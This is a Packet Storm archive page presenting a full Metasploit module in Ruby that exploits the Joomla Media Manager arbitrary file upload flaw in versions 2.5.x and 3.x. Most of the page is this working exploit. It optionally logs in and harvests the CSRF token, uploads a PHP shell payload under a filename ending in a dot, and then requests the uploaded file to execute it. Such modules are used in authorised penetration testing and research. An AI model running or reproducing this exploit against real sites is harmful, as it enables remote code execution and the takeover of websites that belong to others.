Exploit the possiblities

Joomla Media Manager File Upload Vulnerability

Joomla Media Manager File Upload Vulnerability
Posted Aug 14, 2013
Authored by juan vazquez, Jens Hinrichsen | Site metasploit.com

This Metasploit module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component, which comes by default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media Manager, you will need to supply a valid username and password (Editor role or higher) in order to work properly.

tags | exploit, arbitrary, code execution, file upload
systems | linux, ubuntu
advisories | OSVDB-95933
MD5 | cf5b61f56c69e484e93a550bb8d8378c

Joomla Media Manager File Upload Vulnerability

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "Joomla Media Manager File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
which comes by default in Joomla, allowing arbitrary file uploads, and results in
arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
Manager, you will need to supply a valid username and password (Editor role or
higher) in order to work properly.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '95933' ],
[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
[ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
[ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 2.5.x <=2.5.13', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Aug 01 2013",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
OptString.new('USERNAME', [false, 'User to login with', '']),
OptString.new('PASSWORD', [false, 'Password to login with', '']),
], self.class)

end

def peer
return "#{rhost}:#{rport}"
end

def check
res = get_upload_form

if res and res.code == 200
if res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Joomla Media Manager Found but authentication required")
return Exploit::CheckCode::Detected
elsif res.body =~ /<form action="(.*)" id="uploadForm"/
print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
return Exploit::CheckCode::Detected
end
end

return Exploit::CheckCode::Safe
end

def upload(upload_uri)
begin
u = URI(upload_uri)
rescue ::URI::InvalidURIError
fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
end

data = Rex::MIME::Message.new
data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

res = send_request_cgi({
'method' => 'POST',
'uri' => "#{u.path}?#{u.query}",
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => @cookies,
'vars_get' => {
'asset' => 'com_content',
'author' => '',
'format' => '',
'view' => 'images',
'folder' => ''
},
'data' => post_data
})

return res

end

def get_upload_form
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php"),
'cookie' => @cookies,
'encode_params' => false,
'vars_get' => {
'option' => 'com_media',
'view' => 'images',
'tmpl' => 'component',
'e_name' => 'jform_articletext',
'asset' => 'com_content',
'author' => ''
}
})

return res
end

def get_login_form

res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
'cookie' => @cookies,
'vars_get' => {
'view' => 'login'
}
})

return res

end

def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
'cookie' => @cookies,
'vars_get' => {
'task' => 'user.login'
},
'vars_post' => {
'username' => @username,
'password' => @password
}.merge(@login_options)
})

return res
end

def parse_login_options(html)
html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
@login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
}
end

def exploit
@login_options = {}
@cookies = ""
@upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
@username = datastore['USERNAME']
@password = datastore['PASSWORD']

print_status("#{peer} - Checking Access to Media Component...")
res = get_upload_form

if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
print_status("#{peer} - Authentication required... Proceeding...")

if @username.empty? or @password.empty?
fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
end
@cookies = res.get_cookies.sub(/;$/, "")

print_status("#{peer} - Accessing the Login Form...")
res = get_login_form
if res.nil? or res.code != 200 or res.body !~ /login/
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
end
parse_login_options(res.body)

res = login
if not res or res.code != 303
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
end
elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
print_status("#{peer} - Authentication isn't required.... Proceeding...")
@cookies = res.get_cookies.sub(/;$/, "")
else
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
end

print_status("#{peer} - Accessing the Upload Form...")
res = get_upload_form

if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
upload_uri = Rex::Text.html_decode($1)
else
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
end

print_status("#{peer} - Uploading shell...")

res = upload(upload_uri)

if res.nil? or res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
end

register_files_for_cleanup("#{@upload_name}.")
print_status("#{peer} - Executing shell...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "images", @upload_name),
})

end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close